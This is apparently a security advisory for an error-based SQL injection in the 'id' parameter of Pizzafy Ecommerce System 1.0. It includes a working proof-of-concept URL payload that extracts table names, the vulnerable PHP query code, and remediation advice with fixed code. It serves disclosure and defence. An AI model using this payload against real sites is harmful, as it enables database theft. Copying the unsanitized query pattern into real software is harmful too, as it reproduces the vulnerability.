# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview * **Vulnerability Type**: Error-Based SQL Injection * **Severity**: HIGH * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Description**: In the `select` functionality, the `id` parameter and the `id` column are not properly sanitized, allowing attackers to inject malicious SQL commands into backend database queries. * **Vulnerable Endpoint**: `pizzafy/index.php?page=category&id=3` ## Impact Scope * **Confidentiality**: Complete disclosure of database schema and user credentials. * **Integrity**: Unauthorized deletion or modification of records. * **Availability**: Service denial caused by large-scale data deletion. * **Privilege Escalation**: Session hijacking and administrative access obtained through extraction of session data. ## Proof of Concept (PoC) **Exploit Code (GET Request):** ```http http://localhost/pizzafy/index.php?page=category&id=1%20AND%20extractvalue(1,CONCAT(0x7e,(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database())%20LIMIT%200,1),0x7e) ``` **Vulnerable Code:** ```php $id = $_GET['id'] ?? ""; if(empty($id)){ throw new ErrorException("Error: This page requires a category ID."); } $category_qry = $conn->query("SELECT * FROM category_list where id = $id"); if (!$category_qry) { print $conn->error; } if($category_qry->num_rows > 0){ $data = $category_qry->fetch_assoc(); }else{ throw new ErrorException("Error: This page requires a category ID."); } ``` ## Remediation 1. **Use Prepared Statements**: Utilize parameterized queries to prevent SQL injection. 2. **Input Validation**: Validate and sanitize the `id` parameter, allowing only expected values. 3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection. 4. **Monitoring & Logging**: Track and alert on anomalous patterns, such as slow queries or repeated access attempts. 5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities. 6. **Error Handling**: Avoid exposing database-related errors in responses, as this information can aid attackers. **Example of Fixed Code:** ```php $id = isset($_GET['id']) ? (int)$_GET['id'] : 0; if(empty($id) || $id == 0){ throw new ErrorException("Error: This page requires a valid category ID."); } $stmt = $conn->prepare("SELECT * FROM category_list WHERE id = ?"); $stmt->bind_param("i", $id); $stmt->execute(); $category_qry = $stmt->get_result(); if (!$category_qry) { error_log("Database error: " . $conn->error); throw new ErrorException("An error occurred. Please try again later."); } if($category_qry->num_rows > 0){ $data = $category_qry->fetch_assoc(); } else { throw new ErrorException("Error: Category not found."); } ```